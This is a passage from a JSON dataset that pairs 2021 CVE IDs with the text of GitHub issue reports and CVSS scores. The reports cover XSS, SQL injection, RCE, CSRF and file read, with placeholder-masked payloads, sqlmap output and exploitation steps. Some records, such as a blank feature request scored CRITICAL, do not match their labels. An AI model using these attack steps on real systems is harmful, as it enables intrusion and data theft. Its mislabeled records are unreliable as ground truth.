  73441. "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/2052",
  73442. "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/2052",
  73443. "Repo_new": "serghey-rodin/vesta",
  73444. "Issue_Created_At": "2021-05-14T23:15:25Z",
  73445. "description": "Possible file inclusion vulnerability. Hello, I would like to report for possible file inclusion vulnerability. In file PATHTAG APITAG File PATHTAG ERRORTAG",
  73446. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73447. "severity": "CRITICAL",
  73448. "baseScore": 9.8,
  73449. "impactScore": 5.9,
  73450. "exploitabilityScore": 3.9
  73451. },
  73452. {
  73453. "CVE_ID": "CVE-2021-43695",
  73454. "Issue_Url_old": "https://github.com/IssabelFoundation/issabelPBX/issues/33",
  73455. "Issue_Url_new": "https://github.com/issabelfoundation/issabelpbx/issues/33",
  73456. "Repo_new": "issabelfoundation/issabelpbx",
  73457. "Issue_Created_At": "2021-11-14T17:09:49Z",
  73458. "description": "Possible XSS vilnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability: In file FILETAG APITAG In file FILETAG FILETAG ERRORTAG $msg carry the value from $_REQUEST without sanitization. Then there is XSS vulnerability.",
  73459. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73460. "severity": "MEDIUM",
  73461. "baseScore": 6.1,
  73462. "impactScore": 2.7,
  73463. "exploitabilityScore": 2.8
  73464. },
  73465. {
  73466. "CVE_ID": "CVE-2021-43696",
  73467. "Issue_Url_old": "https://github.com/happyman/twmap/issues/57",
  73468. "Issue_Url_new": "https://github.com/happyman/twmap/issues/57",
  73469. "Repo_new": "happyman/twmap",
  73470. "Issue_Created_At": "2021-11-14T23:34:42Z",
  73471. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file line NUMBERTAG APITAG exit function will terminate the script and print a message which has $_REQUEST. Then there is XSS vulnerability",
  73472. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73473. "severity": "MEDIUM",
  73474. "baseScore": 6.1,
  73475. "impactScore": 2.7,
  73476. "exploitabilityScore": 2.8
  73477. },
  73478. {
  73479. "CVE_ID": "CVE-2021-43697",
  73480. "Issue_Url_old": "https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1",
  73481. "Issue_Url_new": "https://github.com/happyliu2014/workerman-thinkphp-redis/issues/1",
  73482. "Repo_new": "happyliu2014/workerman-thinkphp-redis",
  73483. "Issue_Created_At": "2021-11-14T23:42:27Z",
  73484. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file FILETAG line NUMBERTAG CODETAG exit function will terminate the script and print a message which has APITAG Then there is XSS vulnerability.",
  73485. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73486. "severity": "MEDIUM",
  73487. "baseScore": 6.1,
  73488. "impactScore": 2.7,
  73489. "exploitabilityScore": 2.8
  73490. },
  73491. {
  73492. "CVE_ID": "CVE-2021-43698",
  73493. "Issue_Url_old": "https://github.com/sparc/phpWhois.org/issues/21",
  73494. "Issue_Url_new": "https://github.com/sparc/phpwhois.org/issues/21",
  73495. "Repo_new": "sparc/phpwhois.org",
  73496. "Issue_Created_At": "2021-11-15T00:27:17Z",
  73497. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file FILETAG CODETAG exit function will terminate the script and print the message to the user. The message will contain $_GET['query'] then there is XSS vulnerability.",
  73498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73499. "severity": "MEDIUM",
  73500. "baseScore": 6.1,
  73501. "impactScore": 2.7,
  73502. "exploitabilityScore": 2.8
  73503. },
  73504. {
  73505. "CVE_ID": "CVE-2021-43700",
  73506. "Issue_Url_old": "https://github.com/gongwalker/ApiManager/issues/26",
  73507. "Issue_Url_new": "https://github.com/gongwalker/apimanager/issues/26",
  73508. "Repo_new": "gongwalker/apimanager",
  73509. "Issue_Created_At": "2021-11-10T13:32:12Z",
  73510. "description": "APITAG NUMBERTAG sql injection. poc : python3 sqlmap.py u \" URLTAG \" sqlmap identified the following injection point(s) with a total of HTTP(s) requests: Parameter: tag (GET) Type: boolean based blind Title: AND boolean based blind WHERE or HAVING clause Payload: act=api&tag NUMBERTAG AND NUMBERTAG AND APITAG Type: time based blind Title: APITAG NUMBERTAG AND time based blind (query SLEEP) Payload: act=api&tag NUMBERTAG AND (SELECT NUMBERTAG FROM APITAG AND APITAG",
  73511. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73512. "severity": "CRITICAL",
  73513. "baseScore": 9.8,
  73514. "impactScore": 5.9,
  73515. "exploitabilityScore": 3.9
  73516. },
  73517. {
  73518. "CVE_ID": "CVE-2021-43701",
  73519. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/31",
  73520. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/31",
  73521. "Repo_new": "cskaza/cszcms",
  73522. "Issue_Created_At": "2021-04-14T11:09:30Z",
  73523. "description": "Bug Report: Blind SQL Injection Vulnerability. Description: I found Blind SQL Injection vulnerability in your CMS APITAG \"export\" page. It refers to an injection attack where an attacker can execute malicious SQL statements that control a web application's database server. CMS Version NUMBERTAG Affected URL: URLTAG Steps to Reproduce NUMBERTAG At first login your panel NUMBERTAG then go to APITAG Menu > CSV Export / Import NUMBERTAG then select any Table Name and Select Fields. so your request data will be GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Waterfo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG PATHTAG mw back to live edit=true; show sidebar layouts NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG FILETAG FILETAG Proof of Concept: You can see the Proof of Concept. which I've attached a video to confirm the vulnerability. FILETAG Impact: An attacker could extract information from database. Let me know if any further info is required. Thanks & Regards Rahad Chowdhury Cyber Security Specialist APITAG Limited URLTAG",
  73524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  73525. "severity": "MEDIUM",
  73526. "baseScore": 6.5,
  73527. "impactScore": 3.6,
  73528. "exploitabilityScore": 2.8
  73529. },
  73530. {
  73531. "CVE_ID": "CVE-2021-43703",
  73532. "Issue_Url_old": "https://github.com/forget-code/zzcms/issues/1",
  73533. "Issue_Url_new": "https://github.com/forget-code/zzcms/issues/1",
  73534. "Repo_new": "forget-code/zzcms",
  73535. "Issue_Created_At": "2021-11-11T03:47:58Z",
  73536. "description": "By disabling APITAG to bypass administrator authentication restrictions. The administrator authentication code in FILETAG is as follows FILETAG FILETAG is the web application administrator authentication page. When the identity authentication fails, it will jump to the login page. There is a problem with the jump code on line NUMBERTAG of FILETAG . The page is redirected through APITAG but the program execution is not stopped immediately after the jump. So after disabling APITAG you can directly access the administrator console.",
  73537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73538. "severity": "CRITICAL",
  73539. "baseScore": 9.8,
  73540. "impactScore": 5.9,
  73541. "exploitabilityScore": 3.9
  73542. },
  73543. {
  73544. "CVE_ID": "CVE-2021-43707",
  73545. "Issue_Url_old": "https://github.com/maccmspro/maccms10/issues/18",
  73546. "Issue_Url_new": "https://github.com/maccmspro/maccms10/issues/18",
  73547. "Repo_new": "maccmspro/maccms10",
  73548. "Issue_Created_At": "2021-11-11T10:26:51Z",
  73549. "description": "XSS. \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u57fa\u7840 >\u53cb\u94fe\u7ba1\u7406 >\u6dfb\u52a0\uff0c\u5728\u540d\u79f0\u5904link_name FILETAG APITAG FILETAG",
  73550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73551. "severity": "MEDIUM",
  73552. "baseScore": 6.1,
  73553. "impactScore": 2.7,
  73554. "exploitabilityScore": 2.8
  73555. },
  73556. {
  73557. "CVE_ID": "CVE-2021-43721",
  73558. "Issue_Url_old": "https://github.com/leanote/desktop-app/issues/364",
  73559. "Issue_Url_new": "https://github.com/leanote/desktop-app/issues/364",
  73560. "Repo_new": "leanote/desktop-app",
  73561. "Issue_Created_At": "2021-11-12T09:17:28Z",
  73562. "description": "Markdown type note XSS issue. i found a xss problem in the markdown type note you can verify the XSS with payload: APITAG and This leads to remote code execution with payload : APITAG the test version is NUMBERTAG",
  73563. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73564. "severity": "MEDIUM",
  73565. "baseScore": 6.1,
  73566. "impactScore": 2.7,
  73567. "exploitabilityScore": 2.8
  73568. },
  73569. {
  73570. "CVE_ID": "CVE-2021-43724",
  73571. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/890",
  73572. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/890",
  73573. "Repo_new": "intelliants/subrion",
  73574. "Issue_Created_At": "2021-11-08T16:01:45Z",
  73575. "description": "this is Cross Site Scripting (XSS). I have found Cross Site Scripting (XSS) bug in subrion CMS version NUMBERTAG in the Create Page functionality of the admin Account. Steps to Reproduce: just login as admin and clink this url URLTAG As an admin Create test page In the Add a Page section go to the Page Content then clink \u201cimage\u201d choose local file NUMBERTAG svg to upload in url : URLTAG the content of APITAG APITAG APITAG APITAG FILETAG and then double click NUMBERTAG svg we can get a url as FILETAG FILETAG open the url FILETAG Xss prompt box will pop up FILETAG Impact: Session cookies can be stolen , user can be redirected to phishing pages , browser of the user visiting this page can be controlled etc. POC's have been uploaded. FILETAG",
  73576. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  73577. "severity": "MEDIUM",
  73578. "baseScore": 4.8,
  73579. "impactScore": 2.7,
  73580. "exploitabilityScore": 1.7
  73581. },
  73582. {
  73583. "CVE_ID": "CVE-2021-43734",
  73584. "Issue_Url_old": "https://github.com/kekingcn/kkFileView/issues/304",
  73585. "Issue_Url_new": "https://github.com/kekingcn/kkfileview/issues/304",
  73586. "Repo_new": "kekingcn/kkfileview",
  73587. "Issue_Created_At": "2021-11-14T13:08:01Z",
  73588. "description": "arbitrary file read vulnerability. APITAG arbitrary file read vulnerability APITAG APITAG APITAG APITAG NUMBERTAG has arbitrary file read vulnerability which may lead to sensitive file leak on related host\u3002 \u6f0f\u6d1e\u4f4d\u7f6evulerable code location PATHTAG APITAG The vulnerable code is located at line NUMBERTAG in PATHTAG . The value which passed through param APITAG supports file protocol. ERRORTAG APITAG APITAG URLTAG \u53ef\u5f97 The version of official demo site is NUMBERTAG isit URLTAG and the concept is proofed.",
  73589. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73590. "severity": "HIGH",
  73591. "baseScore": 7.5,
  73592. "impactScore": 3.6,
  73593. "exploitabilityScore": 3.9
  73594. },
  73595. {
  73596. "CVE_ID": "CVE-2021-43735",
  73597. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/55",
  73598. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/55",
  73599. "Repo_new": "arterli/cmswing",
  73600. "Issue_Created_At": "2021-11-14T12:04:02Z",
  73601. "description": "SQLi vulnerability in Cmswing NUMBERTAG Find a SQLi vulnerability in cmswing project version APITAG can be found in the analysis below. Local Test APITAG the background of the system, select update_channel module\uff0cthen edit it. FILETAG APITAG behavior rule APITAG FILETAG APITAG FILETAG APITAG anything, then save it.we can find sqli vulnerability. FILETAG FILETAG FILETAG",
  73602. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73603. "severity": "CRITICAL",
  73604. "baseScore": 9.8,
  73605. "impactScore": 5.9,
  73606. "exploitabilityScore": 3.9
  73607. },
  73608. {
  73609. "CVE_ID": "CVE-2021-43736",
  73610. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/56",
  73611. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/56",
  73612. "Repo_new": "arterli/cmswing",
  73613. "Issue_Created_At": "2021-11-14T13:13:32Z",
  73614. "description": "RCE vulnerability in Cmswing NUMBERTAG Find a RCE vulnerability in cmswing project version APITAG can be found in the analysis below. Local Test APITAG the background of the system, select update_channel module\uff0cthen edit it. FILETAG APITAG log rule APITAG or APITAG FILETAG APITAG FILETAG APITAG anything, then save it. We can find that our code is executed FILETAG NUMBERTAG Get IP and open calc. FILETAG FILETAG",
  73615. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73616. "severity": "CRITICAL",
  73617. "baseScore": 9.8,
  73618. "impactScore": 5.9,
  73619. "exploitabilityScore": 3.9
  73620. },
  73621. {
  73622. "CVE_ID": "CVE-2021-43737",
  73623. "Issue_Url_old": "https://github.com/hiliqi/xiaohuanxiong/issues/28",
  73624. "Issue_Url_new": "https://github.com/hiliqi/xiaohuanxiong/issues/28",
  73625. "Repo_new": "hiliqi/xiaohuanxiong",
  73626. "Issue_Created_At": "2021-11-14T14:00:31Z",
  73627. "description": "There is two CSRF vulnerability that can add the administrator account and modify administrator account's password. After the administrator logged in, open the following two page and Click the button, you can use javascript to create a APITAG that is triggered directly poc:one >add new administrator account CODETAG poc:two >modify administrator account's password CODETAG",
  73628. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  73629. "severity": "MEDIUM",
  73630. "baseScore": 6.5,
  73631. "impactScore": 3.6,
  73632. "exploitabilityScore": 2.8
  73633. },
  73634. {
  73635. "CVE_ID": "CVE-2021-43745",
  73636. "Issue_Url_old": "https://github.com/zadam/trilium/issues/2340",
  73637. "Issue_Url_new": "https://github.com/zadam/trilium/issues/2340",
  73638. "Repo_new": "zadam/trilium",
  73639. "Issue_Created_At": "2021-11-15T01:40:53Z",
  73640. "description": "Denial of Service. Preflight Checklist X] I have searched the [issue tracker URLTAG for a bug report that matches the one I want to file, without success. Trilium Version NUMBERTAG What operating system are you using? Windows What is your setup? Local (no sync) Operating System Version Windows NUMBERTAG APITAG Expected Behavior PATHTAG APITAG function NUMBERTAG lines: APITAG > APITAG Actual Behavior local sofeware listen NUMBERTAG send URLTAG similar DDOS FILETAG Additional Information _No response_",
  73641. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  73642. "severity": "MEDIUM",
  73643. "baseScore": 5.5,
  73644. "impactScore": 3.6,
  73645. "exploitabilityScore": 1.8
  73646. },
  73647. {
  73648. "CVE_ID": "CVE-2021-43775",
  73649. "Issue_Url_old": "https://github.com/aimhubio/aim/issues/999",
  73650. "Issue_Url_new": "https://github.com/aimhubio/aim/issues/999",
  73651. "Repo_new": "aimhubio/aim",
  73652. "Issue_Created_At": "2021-11-11T12:25:17Z",
  73653. "description": "Security vulnerabilty. What would be the right contact to report a security vulnerabilty? thanks!",
  73654. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  73655. "severity": "HIGH",
  73656. "baseScore": 8.6,
  73657. "impactScore": 4.0,
  73658. "exploitabilityScore": 3.9
  73659. },
  73660. {
  73661. "CVE_ID": "CVE-2021-43789",
  73662. "Issue_Url_old": "https://github.com/PrestaShop/PrestaShop/issues/26623",
  73663. "Issue_Url_new": "https://github.com/prestashop/prestashop/issues/26623",
  73664. "Repo_new": "prestashop/prestashop",
  73665. "Issue_Created_At": "2021-11-16T09:29:09Z",
  73666. "description": "A. Prerequisites FILETAG X] I have already [searched in existing features request URLTAG and found no previous suggestion of this feature. Is your feature request related to a problem? s Describe the solution you'd like s Alternatives you've considered s Additional context s",
  73667. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73668. "severity": "CRITICAL",
  73669. "baseScore": 9.8,
  73670. "impactScore": 5.9,
  73671. "exploitabilityScore": 3.9
  73672. },
  73673. {
  73674. "CVE_ID": "CVE-2021-43801",
  73675. "Issue_Url_old": "https://github.com/mercurius-js/mercurius/issues/677",
  73676. "Issue_Url_new": "https://github.com/mercurius-js/mercurius/issues/677",
  73677. "Repo_new": "mercurius-js/mercurius",
  73678. "Issue_Created_At": "2021-12-01T16:53:59Z",
  73679. "description": "Context can be undefined in the error handler. In production it's possible to see: ERRORTAG This can happen if an error is thrown in a hook. We should be adding back the check for Context in the error handler. APITAG posted by MENTIONTAG in URLTAG",
  73680. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  73681. "severity": "HIGH",
  73682. "baseScore": 7.5,
  73683. "impactScore": 3.6,
  73684. "exploitabilityScore": 3.9
  73685. },
  73686. {
  73687. "CVE_ID": "CVE-2021-43802",
  73688. "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/5010",
  73689. "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/5010",
  73690. "Repo_new": "ether/etherpad-lite",
  73691. "Issue_Created_At": "2021-04-17T10:06:14Z",
  73692. "description": "Sessionstorage is constantly growing. The session storage seems to be constantly growing When running etherpad we see a constantly growing number of session storage values in the database. Is there a way to clean them up? We already looked into the script, which didn't help. FILETAG . So it seems that this sessions are no group sessions. A standard session storage entry looks like: CODETAG Server (please complete the following information): Etherpad version NUMBERTAG OS: Debian Buster FILETAG version (node version): APITAG npm version (npm version NUMBERTAG Additional context All session storage keys values from mariadb: CODETAG None session storage keys values from mariadb: CODETAG",
  73693. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  73694. "severity": "HIGH",
  73695. "baseScore": 8.8,
  73696. "impactScore": 5.9,
  73697. "exploitabilityScore": 2.8
  73698. },
  73699. {
  73700. "CVE_ID": "CVE-2021-43814",
  73701. "Issue_Url_old": "https://github.com/rizinorg/rizin/issues/2083",
  73702. "Issue_Url_new": "https://github.com/rizinorg/rizin/issues/2083",
  73703. "Repo_new": "rizinorg/rizin",
  73704. "Issue_Created_At": "2021-12-09T15:44:16Z",
  73705. "description": "Heap based OOB write when parsing dwarf die info. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG amd NUMBERTAG File format of the file you reverse (mandatory) | ELF NUMBERTAG Architecture/bits of the file (mandatory) | amd NUMBERTAG APITAG full output, not truncated (mandatory) | rizin NUMBERTAG git @ linu NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Analyzing binaries shouldn't trigger an OOB memory write. Actual behavior There is a heap based out of bounds write in APITAG when reversing an amd NUMBERTAG elf binary with dwarf debug info, respectively. Steps to reproduce the behavior Analyze the binary attached below with aaa on an asan build to reproduce the crash. FILETAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG The issue seems to be that at APITAG the line APITAG gets executed with APITAG equal to NUMBERTAG so this is equivalent to a APITAG (I think in this case a chunk with the smallest allocatable size is returned, which should be around NUMBERTAG or NUMBERTAG bytes, but in APITAG a die_attribute gets written, which is NUMBERTAG bytes in size). This happens because in APITAG the loop gets run APITAG times, but as APITAG is NUMBERTAG and is of type APITAG this results in an undeflow which then triggers the OOB write.",
  73706. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73707. "severity": "HIGH",
  73708. "baseScore": 7.8,
  73709. "impactScore": 5.9,
  73710. "exploitabilityScore": 1.8
  73711. },
  73712. {
  73713. "CVE_ID": "CVE-2021-43816",
  73714. "Issue_Url_old": "https://github.com/containerd/containerd/issues/6194",
  73715. "Issue_Url_new": "https://github.com/containerd/containerd/issues/6194",
  73716. "Repo_new": "containerd/containerd",
  73717. "Issue_Created_At": "2021-11-02T00:39:45Z",
  73718. "description": "cri + selinux: /etc/hosts from APITAG mount getting relabeled. Description When running rke2/k3s pointing at our bundled (or stock) containerd, one can apply an unprivileged pod that relabels APITAG on the host by mounting a APITAG APITAG volume at the same location in the container: ERRORTAG Steps to reproduce the issue NUMBERTAG Install RKE2 on APITAG NUMBERTAG with APITAG enabled (the default when installed via FILETAG NUMBERTAG Establish that your APITAG is correctly labeled: CODETAG NUMBERTAG Apply this pod spec: ERRORTAG NUMBERTAG Wiat for the pod to spin up then check your APITAG : CODETAG Describe the results you received and expected Expected: APITAG retained APITAG type label with no categories Received: APITAG relabeled to APITAG with category labels specific to the container that bind mounted it What version of containerd are you using NUMBERTAG and NUMBERTAG k3s1) Any other relevant information ERRORTAG First seen while running k8s e2e conformance via sonobuoy against rke NUMBERTAG rc1+rke2r1 (most recently against NUMBERTAG rc1+rke2r1): URLTAG APITAG seen with k3s NUMBERTAG that also ships with containerd NUMBERTAG Show configuration if it is related to CRI plugin. ERRORTAG",
  73719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
  73720. "severity": "CRITICAL",
  73721. "baseScore": 9.1,
  73722. "impactScore": 6.0,
  73723. "exploitabilityScore": 2.3
  73724. },
  73725. {
  73726. "CVE_ID": "CVE-2021-43857",
  73727. "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/219",
  73728. "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/219",
  73729. "Repo_new": "gerapy/gerapy",
  73730. "Issue_Created_At": "2021-12-02T12:51:31Z",
  73731. "description": "Gerapy NUMBERTAG project_configure function exist remote code execute !!!. Hi, your project find a vulnerability source location: URLTAG POC\uff1a POST PATHTAG HTTP NUMBERTAG Host: x.x.x.x User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: application/json, text/plain, / Authorization: Token $token Content Type: application/x www form urlencoded Content Length NUMBERTAG spider\": \" APITAG | APITAG \"} FILETAG",
  73732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  73733. "severity": "HIGH",
  73734. "baseScore": 8.8,
  73735. "impactScore": 5.9,
  73736. "exploitabilityScore": 2.8
  73737. },
  73738. {
  73739. "CVE_ID": "CVE-2021-43862",
  73740. "Issue_Url_old": "https://github.com/jcubic/jquery.terminal/issues/727",
  73741. "Issue_Url_new": "https://github.com/jcubic/jquery.terminal/issues/727",
  73742. "Repo_new": "jcubic/jquery.terminal",
  73743. "Issue_Created_At": "2021-12-28T20:03:48Z",
  73744. "description": "Self XSS. Self XSS is possible by typing something like \"onclick=\"alert NUMBERTAG I think it's because data text doesn't contain sanitized characters. Don't think it's critical but there you go regardless :)",
  73745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  73746. "severity": "MEDIUM",
  73747. "baseScore": 5.4,
  73748. "impactScore": 2.7,
  73749. "exploitabilityScore": 2.3
  73750. },
  73751. {
  73752. "CVE_ID": "CVE-2021-44093",
  73753. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/115",
  73754. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/115",
  73755. "Repo_new": "94fzb/zrlog",
  73756. "Issue_Created_At": "2021-11-16T07:45:28Z",
  73757. "description": "APITAG NUMBERTAG Remote command execution vulnerability. there is a remote command execution vulnerability at the upload avatar function on the background. APITAG upload pictures, then intercept data package, like this FILETAG then modify the file name to jsp , you can bypass the limit that cannot be uploaded by JSP files. FILETAG although JSP files have been uploaded, because of the existence of global interceptors, we cannot execute commands. it would return NUMBERTAG APITAG however, through my research, I found that the upload directory can be traversed. just modify the parameter dir , like this FILETAG then the file will be saved to the corresponding directory. APITAG access this file, successfully execute system command APITAG Code analysis. at APITAG APITAG APITAG CODETAG APITAG",
  73758. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73759. "severity": "CRITICAL",
  73760. "baseScore": 9.8,
  73761. "impactScore": 5.9,
  73762. "exploitabilityScore": 3.9
  73763. },
  73764. {
  73765. "CVE_ID": "CVE-2021-44094",
  73766. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/116",
  73767. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/116",
  73768. "Repo_new": "94fzb/zrlog",
  73769. "Issue_Created_At": "2021-11-16T11:45:07Z",
  73770. "description": "APITAG NUMBERTAG has a remote command execution vulnerability at plugin download function. Just download a plugin and intercept your data package. APITAG data package like this APITAG modify the JAR just downloaded, join the malicious code in the startup class. APITAG then modify the parameter host to the malicious JAR file download address APITAG after download, malicious code will be executed APITAG Download Record APITAG",
  73771. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73772. "severity": "HIGH",
  73773. "baseScore": 7.8,
  73774. "impactScore": 5.9,
  73775. "exploitabilityScore": 1.8
  73776. },
  73777. {
  73778. "CVE_ID": "CVE-2021-44095",
  73779. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/1",
  73780. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/1",
  73781. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73782. "Issue_Created_At": "2021-09-27T17:15:07Z",
  73783. "description": "Vulnerability/BUG SQL Injection on login page.. Hi I found a SQL injection vulnerability in you hospital management system. Loign page request APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as show in image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
  73784. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73785. "severity": "CRITICAL",
  73786. "baseScore": 9.8,
  73787. "impactScore": 5.9,
  73788. "exploitabilityScore": 3.9
  73789. },
  73790. {
  73791. "CVE_ID": "CVE-2021-44096",
  73792. "Issue_Url_old": "https://github.com/EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel/issues/2",
  73793. "Issue_Url_new": "https://github.com/egavilan-media/user-registration-and-login-system-with-admin-panel/issues/2",
  73794. "Repo_new": "egavilan-media/user-registration-and-login-system-with-admin-panel",
  73795. "Issue_Created_At": "2021-09-28T18:02:52Z",
  73796. "description": "Vulnerability/BUG SQL Injection on \"profile_action update_user\". Hi I found a SQL injection vulnerability User Registration and Login System With Admin Panel APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as show in image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
  73797. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73798. "severity": "CRITICAL",
  73799. "baseScore": 9.8,
  73800. "impactScore": 5.9,
  73801. "exploitabilityScore": 3.9
  73802. },
  73803. {
  73804. "CVE_ID": "CVE-2021-44097",
  73805. "Issue_Url_old": "https://github.com/EGavilan-Media/Contact-Form-With-Messages-Entry-Management/issues/1",
  73806. "Issue_Url_new": "https://github.com/egavilan-media/contact-form-with-messages-entry-management/issues/1",
  73807. "Repo_new": "egavilan-media/contact-form-with-messages-entry-management",
  73808. "Issue_Created_At": "2021-09-30T08:45:03Z",
  73809. "description": "Vulnerability/BUG SQL Injection while APITAG Hi I found a SQL injection vulnerability in your Contact Form With Messages Entry Management APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as show in image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
  73810. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73811. "severity": "CRITICAL",
  73812. "baseScore": 9.8,
  73813. "impactScore": 5.9,
  73814. "exploitabilityScore": 3.9
  73815. },
  73816. {
  73817. "CVE_ID": "CVE-2021-44098",
  73818. "Issue_Url_old": "https://github.com/EGavilan-Media/Expense-Management-System/issues/1",
  73819. "Issue_Url_new": "https://github.com/egavilan-media/expense-management-system/issues/1",
  73820. "Repo_new": "egavilan-media/expense-management-system",
  73821. "Issue_Created_At": "2021-09-30T09:22:03Z",
